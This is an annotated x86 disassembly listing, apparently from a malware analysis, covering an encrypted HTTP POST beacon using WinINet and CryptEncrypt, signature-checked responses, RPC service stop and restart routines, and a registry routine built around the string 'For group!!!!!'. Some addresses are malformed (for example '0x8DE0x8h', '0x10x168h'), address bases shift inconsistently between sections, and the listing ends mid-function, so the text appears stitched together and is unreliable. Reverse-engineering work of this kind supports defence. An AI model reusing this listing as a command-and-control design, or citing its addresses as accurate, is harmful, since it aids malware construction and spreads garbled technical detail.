- 0x8D2C96 push 0x8DE2E8h ASCII "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0"
- 0x8D2C9B call dword ptr [0x8DE11Ch] InternetOpenA@WININET.DLL [5 Params]
- 0x8D2CA1 mov dword ptr [ebp-10h], eax
- 0x8D2CA4 cmp dword ptr [ebp-10h], 00000000h
- 0x8D2CA8 je 0x8D2DFCh target: 0x8D2DFC
- 0x8D2CAE push 00000001h
- 0x8D2CB0 push 00000000h
- 0x8D2CB2 push 00000003h
- 0x8D2CB4 push 00000000h
- 0x8D2CB6 push 00000000h
- 0x8D2CB8 movzx edx, word ptr [ebp-1Ch]
- 0x8D2CBC push edx
- 0x8D2CBD mov eax, dword ptr [ebp-14h]
- 0x8D2CC0 push eax
- 0x8D2CC1 mov ecx, dword ptr [ebp-10h]
- 0x8D2CC4 push ecx
- 0x8D2CC5 call dword ptr [0x8DE118h] InternetConnectA@WININET.DLL [8 Params]
- 0x8D2CCB mov dword ptr [ebp-24h], eax
- 0x8D2CCE cmp dword ptr [ebp-24h], 00000000h
- 0x8D2CD2 je 0x8D2DF2h target: 0x8D2DF2
- 0x8D2CD8 mov dword ptr [ebp-30h], 0x8DE2E4h ASCII "*/*"
- 0x8D2CDF mov dword ptr [ebp-2Ch], 00000000h
- 0x8D2CE6 push 00000001h
- 0x8D2CE8 push 00000100h
- 0x8D2CED lea edx, dword ptr [ebp-30h]
- 0x8D2CF0 push edx
- 0x8D2CF1 push 00000000h
- 0x8D2CF3 push 00000000h
- 0x8D2CF5 mov eax, dword ptr [ebp-0Ch]
- 0x8D2CF8 push eax
- 0x8D2CF9 push 0x8DE334h ASCII "POST"
- 0x8D2CFE mov ecx, dword ptr [ebp-24h]
- 0x8D2D01 push ecx
- 0x8D2D02 call dword ptr [0x8DE114h] HttpOpenRequestA@WININET.DLL [8 Params]
- 0x8D2D08 mov dword ptr [ebp-28h], eax
- 0x8D2D0B cmp dword ptr [ebp-28h], 00000000h
- 0x8D2D0F je 0x8D2DE8h target: 0x8D2DE8
- 0x8D2D15 push 0x8DE33Ch ASCII "Content-Type: application/x-www-form-urlencoded"
- 0x8D2D1A mov edx, dword ptr [ebp-18h]
- 0x8D2D1D push edx
- 0x8D2D1E call dword ptr [008E12D0h] strcpy@NTDLL.DLL [2 Params]
- 0x8D2D24 add esp, 08h
- 0x8D2D27 mov eax, dword ptr [ebp-04h]
- 0x8D2D2A mov ecx, dword ptr [ebp+10h]
- 0x8D2D2D mov dword ptr [eax], ecx
- 0x8D2D2F mov edx, dword ptr [ebp+10h]
- 0x8D2D32 push edx
- 0x8D2D33 mov eax, dword ptr [ebp+0Ch]
- 0x8D2D36 push eax
- 0x8D2D37 mov ecx, dword ptr [ebp-04h]
- 0x8D2D3A add ecx, 04h
- 0x8D2D3D push ecx
- 0x8D2D3E call dword ptr [008E12E4h] memcpy@NTDLL.DLL [Unknown Params]
- 0x8D2D44 add esp, 0Ch
- 0x8D2D47 mov edx, dword ptr [ebp-04h]
- 0x8D2D4A add edx, dword ptr [ebp+10h]
- 0x8D2D4D mov eax, dword ptr [ebp+18h]
- 0x8D2D50 mov dword ptr [edx+04h], eax
- 0x8D2D53 mov ecx, dword ptr [ebp+18h]
- 0x8D2D56 push ecx
- 0x8D2D57 mov edx, dword ptr [ebp+14h]
- 0x8D2D5A push edx
- 0x8D2D5B mov eax, dword ptr [ebp+10h]
- 0x8D2D5E mov ecx, dword ptr [ebp-04h]
- 0x8D2D61 lea edx, dword ptr [ecx+eax+08h]
- 0x8D2D65 push edx
- 0x8D2D66 call dword ptr [008E12E4h] memcpy@NTDLL.DLL [Unknown Params]
- 0x8D2D6C add esp, 0Ch
- 0x8D2D6F mov eax, dword ptr [ebp+18h]
- 0x8D2D72 mov ecx, dword ptr [ebp+10h]
- 0x8D2D75 lea edx, dword ptr [ecx+eax+08h]
- 0x8D2D79 mov dword ptr [ebp-34h], edx
- 0x8D2D7C mov eax, dword ptr [ebp-34h]
- 0x8D2D7F push eax
- 0x8D2D80 mov ecx, dword ptr [ebp-04h]
- 0x8D2D83 push ecx
- 0x8D2D84 mov edx, dword ptr [ebp-18h]
- 0x8D2D87 push edx
- 0x8D2D88 call dword ptr [008E12BCh] strlen@NTDLL.DLL [2 Params]
- 0x8D2D8E add esp, 04h
- 0x8D2D91 push eax
- 0x8D2D92 mov eax, dword ptr [ebp-18h]
- 0x8D2D95 push eax
- 0x8D2D96 mov ecx, dword ptr [ebp-28h]
- 0x8D2D99 push ecx
- 0x8D2D9A call dword ptr [0x8DE110h] HttpSendRequestA@WININET.DLL [5 Params]
- 0x8D2DA0 test eax, eax
- 0x8D2DA2 je 0x8D2DDEh target: 0x8D2DDE
- 0x8D2DA4 lea edx, dword ptr [ebp-20h] xref: 0x8D2DDC
- 0x8D2DA7 push edx
- 0x8D2DA8 push 00001000h
- 0x8D2DAD mov eax, dword ptr [ebp+1Ch]
- 0x8D2DB0 add eax, dword ptr [ebp-08h]
- 0x8D2DB3 push eax
- 0x8D2DB4 mov ecx, dword ptr [ebp-28h]
- 0x8D2DB7 push ecx
- 0x8D2DB8 call dword ptr [0x8DE10Ch] InternetReadFile@WININET.DLL [4 Params]
- 0x8D2DBE test eax, eax
- 0x8D2DC0 jne 0x8D2DCBh target: 0x8D2DCB
- 0x8D2DC2 mov dword ptr [ebp-08h], 00000000h
- 0x8D2DC9 jmp 0x8D2DDEh target: 0x8D2DDE
- 0x8D2DCB cmp dword ptr [ebp-20h], 00000000h xref: 0x8D2DC0
- 0x8D2DCF jne 0x8D2DD3h target: 0x8D2DD3
- 0x8D2DD1 jmp 0x8D2DDEh target: 0x8D2DDE
- 0x8D2DD3 mov edx, dword ptr [ebp-08h] xref: 0x8D2DCF
- 0x8D2DD6 add edx, dword ptr [ebp-20h]
- 0x8D2DD9 mov dword ptr [ebp-08h], edx
- 0x8D2DDC jmp 0x8D2DA4h target: 0x8D2DA4
- 0x8D2DDE mov eax, dword ptr [ebp-28h] xref: 0x8D2DA2 0x8D2DD1 0x8D2DC9
- 0x8D2DE1 push eax
- 0x8D2DE2 call dword ptr [0x8DE108h] InternetCloseHandle@WININET.DLL [1 Params]
- 0x8D2DE8 mov ecx, dword ptr [ebp-24h] xref: 0x8D2D0F
- 0x8D2DEB push ecx
- 0x8D2DEC call dword ptr [0x8DE108h] InternetCloseHandle@WININET.DLL [1 Params]
- 0x8D2DF2 mov edx, dword ptr [ebp-10h] xref: 0x8D2CD2
- 0x8D2DF5 push edx
- 0x8D2DF6 call dword ptr [0x8DE108h] InternetCloseHandle@WININET.DLL [1 Params]
- 0x8D2DFC mov eax, dword ptr [ebp-18h] xref: 0x8D2CA8
- 0x8D2DFF push eax
- 0x8D2E00 push 00000000h
- 0x8D2E02 mov ecx, dword ptr [008E12D8h] 0x00AC0000
- 0x8D2E08 push ecx
- 0x8D2E09 call dword ptr [0x8DE0B4h] RtlFreeHeap@NTDLL.DLL [3 Params]
- 0x8D2E0F mov edx, dword ptr [ebp-04h]
- 0x8D2E12 push edx
- 0x8D2E13 push 00000000h
- 0x8D2E15 mov eax, dword ptr [008E12D8h] 0x00AC0000
- 0x8D2E1A push eax
- 0x8D2E1B call dword ptr [0x8DE0B4h] RtlFreeHeap@NTDLL.DLL [3 Params]
- 0x8D2E21 mov ecx, dword ptr [ebp-14h]
- 0x8D2E24 push ecx
- 0x8D2E25 push 00000000h
- 0x8D2E27 mov edx, dword ptr [008E12D8h] 0x00AC0000
- 0x8D2E2D push edx
- 0x8D2E2E call dword ptr [0x8DE0B4h] RtlFreeHeap@NTDLL.DLL [3 Params]
- 0x8D2E34 mov eax, dword ptr [ebp-0Ch]
- 0x8D2E37 push eax
- 0x8D2E38 push 00000000h
- 0x8D2E3A mov ecx, dword ptr [008E12D8h] 0x00AC0000
- 0x8D2E40 push ecx
- 0x8D2E41 call dword ptr [0x8DE0B4h] RtlFreeHeap@NTDLL.DLL [3 Params]
- 0x8D2E47 mov eax, dword ptr [ebp-08h]
- 0x8D2E4A mov esp, ebp
- 0x8D2E4C pop ebp
- 0x8D2E4D ret
- // Using Windows encryption (CryptEncrypt) on the data sent in the POST. The 80 00 00 00 length prefix seen in both captures is consistent with a 128-byte block from the 1024-bit key above, though this is not confirmed here.
- 0x8D2E50 push ebp xref: 0x8D5AC1 0x8D5A8E
- 0x8D2E51 mov ebp, esp
- 0x8D2E53 sub esp, 70h
- 0x8D2E56 mov dword ptr [ebp-0Ch], 00000000h
- 0x8D2E5D mov eax, dword ptr [ebp+0Ch]
- 0x8D2E60 mov dword ptr [ebp-54h], eax
- 0x8D2E63 mov ecx, dword ptr [ebp-54h]
- 0x8D2E66 add ecx, 01h
- 0x8D2E69 mov dword ptr [ebp-58h], ecx
- 0x8D2E6C mov edx, dword ptr [ebp-54h] xref: 0x8D2E7C
- 0x8D2E6F mov al, byte ptr [edx]
- 0x8D2E71 mov byte ptr [ebp-59h], al
- 0x8D2E74 add dword ptr [ebp-54h], 01h
- 0x8D2E78 cmp byte ptr [ebp-59h], 00000000h
- 0x8D2E7C jne 0x8D2E6Ch target: 0x8D2E6C
- 0x8D2E7E mov ecx, dword ptr [ebp-54h]
- 0x8D2E81 sub ecx, dword ptr [ebp-58h]
- 0x8D2E84 mov dword ptr [ebp-60h], ecx
- 0x8D2E87 cmp dword ptr [ebp-60h], 00000800h
- 0x8D2E8E jbe 0x8D2E99h target: 0x8D2E99
- 0x8D2E90 mov dword ptr [ebp-04h], 00100000h
- 0x8D2E97 jmp 0x8D2EA0h target: 0x8D2EA0
- 0x8D2E99 mov dword ptr [ebp-04h], 00001000h xref: 0x8D2E8E
- 0x8D2EA0 mov edx, dword ptr [ebp-04h] xref: 0x8D2E97
- 0x8D2EA3 push edx
- 0x8D2EA4 call dword ptr [0x8DE0D8h] malloc@MSVCRT.DLL [0 Params]
- 0x8D2EAA add esp, 04h
- 0x8D2EAD mov dword ptr [ebp-14h], eax
- 0x8D2EB0 mov eax, dword ptr [ebp-04h]
- 0x8D2EB3 mov dword ptr [ebp-18h], eax
- 0x8D2EB6 mov ecx, dword ptr [ebp-04h]
- 0x8D2EB9 push ecx
- 0x8D2EBA call dword ptr [0x8DE0D8h] malloc@MSVCRT.DLL [0 Params]
- 0x8D2EC0 add esp, 04h
- 0x8D2EC3 mov dword ptr [ebp-08h], eax
- 0x8D2EC6 mov edx, dword ptr [ebp-04h]
- 0x8D2EC9 mov dword ptr [ebp-10h], edx
- 0x8D2ECC mov eax, dword ptr [ebp+0Ch]
- 0x8D2ECF mov dword ptr [ebp-64h], eax
- 0x8D2ED2 mov ecx, dword ptr [ebp-64h]
- 0x8D2ED5 add ecx, 01h
- 0x8D2ED8 mov dword ptr [ebp-68h], ecx
- 0x8D2EDB mov edx, dword ptr [ebp-64h] xref: 0x8D2EEB
- 0x8D2EDE mov al, byte ptr [edx]
- 0x8D2EE0 mov byte ptr [ebp-69h], al
- 0x8D2EE3 add dword ptr [ebp-64h], 01h
- 0x8D2EE7 cmp byte ptr [ebp-69h], 00000000h
- 0x8D2EEB jne 0x8D2EDBh target: 0x8D2EDB
- 0x8D2EED mov ecx, dword ptr [ebp-64h]
- 0x8D2EF0 sub ecx, dword ptr [ebp-68h]
- 0x8D2EF3 mov dword ptr [ebp-70h], ecx
- 0x8D2EF6 push 00000000h
- 0x8D2EF8 push 00000000h
- 0x8D2EFA push 00000009h
- 0x8D2EFC mov edx, dword ptr [ebp-70h]
- 0x8D2EFF push edx
- 0x8D2F00 mov eax, dword ptr [ebp+0Ch]
- 0x8D2F03 push eax
- 0x8D2F04 lea ecx, dword ptr [ebp-18h]
- 0x8D2F07 push ecx
- 0x8D2F08 mov edx, dword ptr [ebp-14h]
- 0x8D2F0B push edx
- 0x8D2F0C call 0x8D8430h target: 0x8D8430
- 0x8D2F11 test eax, eax
- 0x8D2F13 jne 0x8D3107h target: 0x8D3107
- 0x8D2F19 push 00000010h
- 0x8D2F1B lea eax, dword ptr [ebp-2Ch]
- 0x8D2F1E push eax
- 0x8D2F1F call 0x8D1EB0h target: 0x8D1EB0
- 0x8D2F24 add esp, 08h
- 0x8D2F27 push 00000010h
- 0x8D2F29 lea ecx, dword ptr [ebp-2Ch]
- 0x8D2F2C push ecx
- 0x8D2F2D mov edx, dword ptr [ebp-18h]
- 0x8D2F30 push edx
- 0x8D2F31 mov eax, dword ptr [ebp-08h]
- 0x8D2F34 push eax
- 0x8D2F35 mov ecx, dword ptr [ebp-14h]
- 0x8D2F38 push ecx
- 0x8D2F39 call 0x8D1E10h target: 0x8D1E10
- 0x8D2F3E add esp, 14h
- 0x8D2F41 mov edx, dword ptr [ebp-18h]
- 0x8D2F44 mov dword ptr [ebp-10h], edx
- 0x8D2F47 mov dword ptr [ebp-1Ch], 00000000h
- 0x8D2F4E push 00000010h
- 0x8D2F50 lea eax, dword ptr [ebp-1Ch]
- 0x8D2F53 push eax
- 0x8D2F54 push 00000000h
- 0x8D2F56 push 00000000h
- 0x8D2F58 push 00000001h
- 0x8D2F5A push 00000000h
- 0x8D2F5C mov ecx, dword ptr [ebp+18h]
- 0x8D2F5F push ecx
- 0x8D2F60 call dword ptr [0x8DE004h] CryptEncrypt@ADVAPI32.DLL [7 Params]
- 0x8D2F66 test eax, eax
- 0x8D2F68 je 0x8D3107h target: 0x8D3107
- 0x8D2F6E mov edx, dword ptr [ebp-1Ch]
- 0x8D2F71 push edx
- 0x8D2F72 call dword ptr [0x8DE0D8h] malloc@MSVCRT.DLL [0 Params]
- 0x8D2F78 add esp, 04h
- 0x8D2F7B mov dword ptr [ebp-34h], eax
- 0x8D2F7E mov dword ptr [ebp-30h], 00000010h
- 0x8D2F85 mov eax, dword ptr [ebp-34h]
- 0x8D2F88 mov ecx, dword ptr [ebp-2Ch]
- 0x8D2F8B mov dword ptr [eax], ecx
- 0x8D2F8D mov edx, dword ptr [ebp-28h]
- 0x8D2F90 mov dword ptr [eax+04h], edx
- 0x8D2F93 mov ecx, dword ptr [ebp-24h]
- 0x8D2F96 mov dword ptr [eax+08h], ecx
- 0x8D2F99 mov edx, dword ptr [ebp-20h]
- 0x8D2F9C mov dword ptr [eax+0Ch], edx
- 0x8D2F9F mov eax, dword ptr [ebp-1Ch]
- 0x8D2FA2 push eax
- 0x8D2FA3 lea ecx, dword ptr [ebp-30h]
- 0x8D2FA6 push ecx
- 0x8D2FA7 mov edx, dword ptr [ebp-34h]
- 0x8D2FAA push edx
- 0x8D2FAB push 00000000h
- 0x8D2FAD push 00000001h
- 0x8D2FAF push 00000000h
- 0x8D2FB1 mov eax, dword ptr [ebp+18h]
- 0x8D2FB4 push eax
- 0x8D2FB5 call dword ptr [0x8DE004h] CryptEncrypt@ADVAPI32.DLL [7 Params]
- 0x8D2FBB test eax, eax
- 0x8D2FBD je 0x8D30FAh target: 0x8D30FA
- 0x8D2FC3 mov ecx, dword ptr [ebp+10h]
- 0x8D2FC6 push ecx
- 0x8D2FC7 mov edx, dword ptr [ebp-10h]
- 0x8D2FCA push edx
- 0x8D2FCB mov eax, dword ptr [ebp-08h]
- 0x8D2FCE push eax
- 0x8D2FCF mov ecx, dword ptr [ebp-1Ch]
- 0x8D2FD2 push ecx
- 0x8D2FD3 mov edx, dword ptr [ebp-34h]
- 0x8D2FD6 push edx
- 0x8D2FD7 mov eax, dword ptr [ebp+08h]
- 0x8D2FDA push eax
- 0x8D2FDB call 0x8D2C00h target: 0x8D2C00
- 0x8D2FE0 add esp, 18h
- 0x8D2FE3 mov dword ptr [ebp-38h], eax
- 0x8D2FE6 cmp dword ptr [ebp-38h], 04h
- 0x8D2FEA jbe 0x8D30FAh target: 0x8D30FA
- 0x8D2FF0 mov ecx, dword ptr [ebp+10h]
- 0x8D2FF3 mov edx, dword ptr [ecx]
- 0x8D2FF5 mov dword ptr [ebp-3Ch], edx
- 0x8D2FF8 mov eax, dword ptr [ebp+10h]
- 0x8D2FFB add eax, 04h
- 0x8D2FFE mov dword ptr [ebp-40h], eax
- 0x8D3001 mov ecx, dword ptr [ebp-3Ch]
- 0x8D3004 add ecx, 08h
- 0x8D3007 cmp ecx, dword ptr [ebp-38h]
- 0x8D300A jnc 0x8D30FAh target: 0x8D30FA
- 0x8D3010 mov edx, dword ptr [ebp+10h]
- 0x8D3013 add edx, dword ptr [ebp-3Ch]
- 0x8D3016 mov eax, dword ptr [edx+04h]
- 0x8D3019 mov dword ptr [ebp-44h], eax
- 0x8D301C mov ecx, dword ptr [ebp-3Ch]
- 0x8D301F mov edx, dword ptr [ebp+10h]
- 0x8D3022 lea eax, dword ptr [edx+ecx+08h]
- 0x8D3026 mov dword ptr [ebp-48h], eax
- 0x8D3029 mov ecx, dword ptr [ebp-44h]
- 0x8D302C mov edx, dword ptr [ebp-3Ch]
- 0x8D302F lea eax, dword ptr [edx+ecx+08h]
- 0x8D3033 cmp eax, dword ptr [ebp-38h]
- 0x8D3036 jne 0x8D30FAh target: 0x8D30FA
- 0x8D303C lea ecx, dword ptr [ebp-4Ch]
- 0x8D303F push ecx
- 0x8D3040 push 00000000h
- 0x8D3042 push 00000000h
- 0x8D3044 push 00008003h
- 0x8D3049 mov edx, dword ptr [ebp+14h]
- 0x8D304C push edx
- 0x8D304D call dword ptr [0x8DE0x8h] CryptCreateHash@ADVAPI32.DLL [5 Params]
- 0x8D3053 push 00000000h
- 0x8D3055 push 00000010h
- 0x8D3057 lea eax, dword ptr [ebp-2Ch]
- 0x8D305A push eax
- 0x8D305B mov ecx, dword ptr [ebp-4Ch]
- 0x8D305E push ecx
- 0x8D305F call dword ptr [0x8DE00Ch] CryptHashData@ADVAPI32.DLL [4 Params]
- 0x8D3065 push 00000000h
- 0x8D3067 push 00000000h
- 0x8D3069 mov edx, dword ptr [ebp+18h]
- 0x8D306C push edx
- 0x8D306D mov eax, dword ptr [ebp-3Ch]
- 0x8D3070 push eax
- 0x8D3071 mov ecx, dword ptr [ebp-40h]
- 0x8D3074 push ecx
- 0x8D3075 mov edx, dword ptr [ebp-4Ch]
- 0x8D3078 push edx
- 0x8D3079 call dword ptr [0x8DE010h] CryptVerifySignatureA@ADVAPI32.DLL [6 Params]
- 0x8D307F test eax, eax
- 0x8D3081 je 0x8D30F0h target: 0x8D30F0
- 0x8D3083 mov eax, dword ptr [ebp-44h]
- 0x8D3086 push eax
- 0x8D3087 call dword ptr [0x8DE0D8h] malloc@MSVCRT.DLL [0 Params]
- 0x8D308D add esp, 04h
- 0x8D3090 mov dword ptr [ebp-50h], eax
- 0x8D3093 push 00000010h
- 0x8D3095 lea ecx, dword ptr [ebp-2Ch]
- 0x8D3098 push ecx
- 0x8D3099 mov edx, dword ptr [ebp-44h]
- 0x8D309C push edx
- 0x8D309D mov eax, dword ptr [ebp-50h]
- 0x8D30A0 push eax
- 0x8D30A1 mov ecx, dword ptr [ebp-48h]
- 0x8D30A4 push ecx
- 0x8D30A5 call 0x8D1E10h target: 0x8D1E10
- 0x8D30AA add esp, 14h
- 0x8D30AD mov dword ptr [ebp-0Ch], 00A00000h
- 0x8D30B4 push 00000000h xref: 0x8D317D
- 0x8D30B6 push 00000000h
- 0x8D30B8 mov edx, dword ptr [ebp-44h] xref: 0x8D318D
- 0x8D30BB push edx
- 0x8D30BC mov eax, dword ptr [ebp-50h]
- 0x8D30BF push eax
- 0x8D30C0 lea ecx, dword ptr [ebp-0Ch]
- 0x8D30C3 push ecx
- 0x8D30C4 mov edx, dword ptr [ebp+10h]
- 0x8D30C7 push edx
- 0x8D30C8 call 0x8D84FAh target: 0x8D84FA
- 0x8D30CD test eax, eax
- 0x8D30CF jne 0x8D30DCh target: 0x8D30DC
- 0x8D30D1 mov eax, dword ptr [ebp+10h]
- 0x8D30D4 add eax, dword ptr [ebp-0Ch]
- 0x8D30D7 mov byte ptr [eax], 00000000h
- 0x8D30DA jmp 0x8D30E3h target: 0x8D30E3
- 0x8D30DC mov dword ptr [ebp-0Ch], 00000000h xref: 0x8D30CF
- 0x8D30E3 mov ecx, dword ptr [ebp-50h] xref: 0x8D30DA
- 0x8D30E6 push ecx
- 0x8D30E7 call dword ptr [0x8DE0D4h] free@MSVCRT.DLL [0 Params]
- 0x8D30ED add esp, 04h
- 0x8D30F0 mov edx, dword ptr [ebp-4Ch] xref: 0x8D3081
- 0x8D30F3 push edx
- 0x8D30F4 call dword ptr [0x8DE000h] CryptDestroyHash@ADVAPI32.DLL [1 Params]
- 0x8D30FA mov eax, dword ptr [ebp-34h] xref: 0x8D2FBD 0x8D2FEA 0x8D300A 0x8D3036
- 0x8D30FD push eax
- 0x8D30FE call dword ptr [0x8DE0D4h] free@MSVCRT.DLL [0 Params]
- 0x8D3104 add esp, 04h
- 0x8D3107 mov ecx, dword ptr [ebp-14h] xref: 0x8D2F13 0x8D2F68
- 0x8D310A push ecx
- 0x8D310B call dword ptr [0x8DE0D4h] free@MSVCRT.DLL [0 Params]
- 0x8D3111 add esp, 04h
- 0x8D3114 mov edx, dword ptr [ebp-08h]
- 0x8D3117 push edx
- 0x8D3118 call dword ptr [0x8DE0D4h] free@MSVCRT.DLL [0 Params]
- 0x8D311E add esp, 04h
- 0x8D3121 mov eax, dword ptr [ebp-0Ch]
- 0x8D3124 mov esp, ebp
- 0x8D3126 pop ebp
- 0x8D3127 ret function end
- // Stopping RPC Service....
- 0x1031D8 call dword ptr [0x101130h] RpcServerUnregisterIf@RPCRT4.DLL
- 0x1031DE mov esi, 0x104094h
- 0x1031E3 push esi
- 0x1031E4 mov edi, eax
- 0x1031E6 call dword ptr [0x10x168h] EnterCriticalSection@KERNEL32.DLL
- 0x1031EC dec dword ptr [0x104090h]
- 0x1031F2 jne 0x103202h target: 0x103202
- 0x1031F4 push 00000000h
- 0x1031F6 call dword ptr [0x101144h] RpcMgmtStopServerListening@RPCRT4.DLL [1 Params]
- 0x1031FC call dword ptr [0x101128h] RpcMgmtWaitServerListen@RPCRT4.DLL
- 0x103202 push esi xref: 0x1031F2
- 0x103203 call dword ptr [0x10x160h] LeaveCriticalSection@KERNEL32.DLL
- 0x103209 push edi
- 0x10320A call dword ptr [0x101140h] I_RpcMapWin32Status@RPCRT4.DLL [1 Params]
- 0x103210 pop edi
- 0x103211 pop esi
- 0x103212 pop ebp
- 0x103213 retn 0004h
- // Restarted it...
- // Function header (review): stdcall routine with two stack args ([ebp+08h], [ebp+0Ch]); returns an
- // RPC status in eax via I_RpcMapWin32Status and pops 8 bytes (retn 0008h). Mirrors the
- // "Stopping RPC Service" routine above (critical section + listener counter), here on the
- // 0x1004094 / 0x1004090 globals. esi and edi are pushed on entry and popped before the return.
- 0x1001DE2 push ebp
- 0x1001DE3 mov ebp, esp
- 0x1001DE5 push esi
- 0x1001DE6 push edi
- // esi = critical-section object at 0x1004094; entered here, left at 0x1001E2F on every path
- 0x1001DE7 mov esi, 0x1004094h
- 0x1001DEC push esi
- 0x1001DED call dword ptr [0x1001068h] EnterCriticalSection@KERNEL32.DLL
- // Both caller args are forwarded to the helper at 0x1001E47; edi = its result.
- // Non-zero means failure: the listen step is skipped and that status is mapped below.
- 0x1001DF3 push dword ptr [ebp+0Ch]
- 0x1001DF6 push dword ptr [ebp+08h]
- 0x1001DF9 call 0x1001E47h target: 0x1001E47
- 0x1001DFE mov edi, eax
- 0x1001E00 test edi, edi
- 0x1001E02 jne 0x1001E2Eh target: 0x1001E2E
- // Listener counter at 0x1004090: only the 0 -> 1 transition calls RpcServerListen
- // (the stop routine above decrements it and stops listening on the 1 -> 0 transition).
- 0x1001E04 inc dword ptr [0x1004090h]
- 0x1001E0A cmp dword ptr [0x1004090h], 01h
- 0x1001E11 jne 0x1001E2Eh target: 0x1001E2E
- // RpcServerListen(MinimumCallThreads=1, MaxCalls=0x3039, DontWait=1); pushes are right-to-left
- 0x1001E13 push 00000001h
- 0x1001E15 push 00003039h
- 0x1001E1A push 00000001h
- 0x1001E1C call dword ptr [0x1001134h] RpcServerListen@RPCRT4.DLL
- 0x1001E22 mov edi, eax
- // 0x6B1 = 1713 = RPC_S_ALREADY_LISTENING is downgraded to success (edi = 0).
- // NOTE(review): any other RpcServerListen failure leaves the counter at 0x1004090 incremented
- // although no listener was started, so a later stop would decrement it to 0 and call
- // RpcMgmtStopServerListening anyway — inferred from this listing only, confirm.
- 0x1001E24 cmp edi, 000006B1h
- 0x1001E2A jne 0x1001E2Eh target: 0x1001E2E
- 0x1001E2C xor edi, edi
- // Common exit: release the critical section, then eax = I_RpcMapWin32Status(edi)
- 0x1001E2E push esi xref: 0x1001E02 0x1001E11 0x1001E2A
- 0x1001E2F call dword ptr [0x1001060h] LeaveCriticalSection@KERNEL32.DLL
- 0x1001E35 push edi
- 0x1001E36 call dword ptr [0x1001140h] I_RpcMapWin32Status@RPCRT4.DLL [1 Params]
- 0x1001E3C pop edi
- 0x1001E3D pop esi
- 0x1001E3E pop ebp
- 0x1001E3F retn 0008h
- // The typical "For group!!!!!" registry buff..
- /*
- For group!!!!!, ADDR: 0x0D6EA1
- For group!!!!!, ADDR: 0x0D6EC8
- For group!!!!!, ADDR: 0x0D6EF9
- For group!!!!!, ADDR: 0x0D6F3A
- */
- 0x0D6E00 push ebp xref: 0x0D63D3
- 0x0D6E01 mov ebp, esp
- 0x0D6E03 sub esp, 28h
- 0x0D6E06 push esi
- 0x0D6E07 mov byte ptr [ebp-15h], 00000000h
- 0x0D6E0B push 00001000h
- 0x0D6E10 push 00000000h
- 0x0D6E12 mov eax, dword ptr [008E12D8h] 0x00AC0000
- 0x0D6E17 push eax
- 0x0D6E18 call dword ptr [0x0DE0B0h] RtlAllocateHeap@NTDLL.DLL [3 Params]
- 0x0D6E1E mov dword ptr [ebp-20h], eax
- 0x0D6E21 push 00001000h
- 0x0D6E26 push 00000000h
- 0x0D6E28 mov ecx, dword ptr [008E12D8h] 0x00AC0000
- 0x0D6E2E push ecx
- 0x0D6E2F call dword ptr [0x0DE0B0h] RtlAllocateHeap@NTDLL.DLL [3 Params]
- 0x0D6E35 mov dword ptr [ebp-1Ch], eax
- 0x0D6E38 lea edx, dword ptr [ebp-0Ch]
- 0x0D6E3B push edx
- 0x0D6E3C call 0x0D19D0h target: 0x0D19D0
- 0x0D6E41 add esp, 04h
- 0x0D6E44 push 0x0DF028h ASCII "Software\"
- 0x0D6E49 mov eax, dword ptr [ebp-20h]
- 0x0D6E4C push eax
- 0x0D6E4D call dword ptr [008E12D0h] strcpy@NTDLL.DLL [2 Params]
- 0x0D6E53 add esp, 08h
- 0x0D6E56 lea ecx, dword ptr [ebp-0Ch]
- 0x0D6E59 push ecx
- 0x0D6E5A mov edx, dword ptr [ebp-20h]
- 0x0D6E5D push edx
- 0x0D6E5E call dword ptr [008E12E0h] strcat@NTDLL.DLL [2 Params]
- 0x0D6E64 add esp, 08h
- 0x0D6E67 mov eax, dword ptr [ebp-1Ch]
- 0x0D6E6A push eax
- 0x0D6E6B call 0x0D19D0h target: 0x0D19D0
- 0x0D6E70 add esp, 04h
- 0x0D6E73 push 00001000h
- 0x0D6E78 push 00000000h
- 0x0D6E7A mov ecx, dword ptr [008E12D8h] 0x00AC0000
- 0x0D6E80 push ecx
- 0x0D6E81 call dword ptr [0x0DE0B0h] RtlAllocateHeap@NTDLL.DLL [3 Params]
- 0x0D6E87 mov dword ptr [ebp-14h], eax
- 0x0D6E8A push 00001000h
- 0x0D6E8F push 00000000h
- 0x0D6E91 mov edx, dword ptr [008E12D8h] 0x00AC0000
- 0x0D6E97 push edx
- 0x0D6E98 call dword ptr [0x0DE0B0h] RtlAllocateHeap@NTDLL.DLL [3 Params]
- 0x0D6E9E mov dword ptr [ebp-24h], eax
- 0x0D6EA1 push 0x0DF034h ASCII "For group!!!!!"
- 0x0D6EA6 mov eax, dword ptr [ebp-14h]
- 0x0D6EA9 push eax
- 0x0D6EAA call dword ptr [008E12D0h] strcpy@NTDLL.DLL [2 Params]
- 0x0D6EB0 add esp, 08h
- 0x0D6EB3 mov ecx, dword ptr [ebp+08h]
- 0x0D6EB6 push ecx
- 0x0D6EB7 call dword ptr [008E12BCh] strlen@NTDLL.DLL [2 Params]
- 0x0D6EBD add esp, 04h
- 0x0D6EC0 add eax, 01h
- 0x0D6EC3 push eax
- 0x0D6EC4 mov edx, dword ptr [ebp+08h]
- 0x0D6EC7 push edx
- 0x0D6EC8 push 0x0DF044h ASCII "For group!!!!!"
- 0x0D6ECD call dword ptr [008E12BCh] strlen@NTDLL.DLL [2 Params]
- 0x0D6ED3 add esp, 04h
- 0x0D6ED6 mov ecx, dword ptr [ebp-14h]
- 0x0D6ED9 lea edx, dword ptr [ecx+eax+01h]
- 0x0D6EDD push edx
- 0x0D6EDE call dword ptr [008E12E4h] memcpy@NTDLL.DLL [Unknown Params]
- 0x0D6EE4 add esp, 0Ch
- 0x0D6EE7 mov eax, dword ptr [ebp+0Ch]
- 0x0D6EEA push eax
- 0x0D6EEB call dword ptr [008E12BCh] strlen@NTDLL.DLL [2 Params]
- 0x0D6EF1 add esp, 04h
- 0x0D6EF4 push eax
- 0x0D6EF5 mov ecx, dword ptr [ebp+0Ch]
- 0x0D6EF8 push ecx
- 0x0D6EF9 push 0x0DF054h ASCII "For group!!!!!"
- 0x0D6EFE call dword ptr [008E12BCh] strlen@NTDLL.DLL [2 Params]
- 0x0D6F04 add esp, 04h
- 0x0D6F07 mov esi, eax
- 0x0D6F09 mov edx, dword ptr [ebp+08h]
- 0x0D6F0C push edx
- 0x0D6F0D call dword ptr [008E12BCh] strlen@NTDLL.DLL [2 Params]
- 0x0D6F13 add esp, 04h
- 0x0D6F16 lea eax, dword ptr [esi+eax+02h]
- 0x0D6F1A push eax
- 0x0D6F1B mov ecx, dword ptr [ebp-24h]
- 0x0D6F1E push ecx
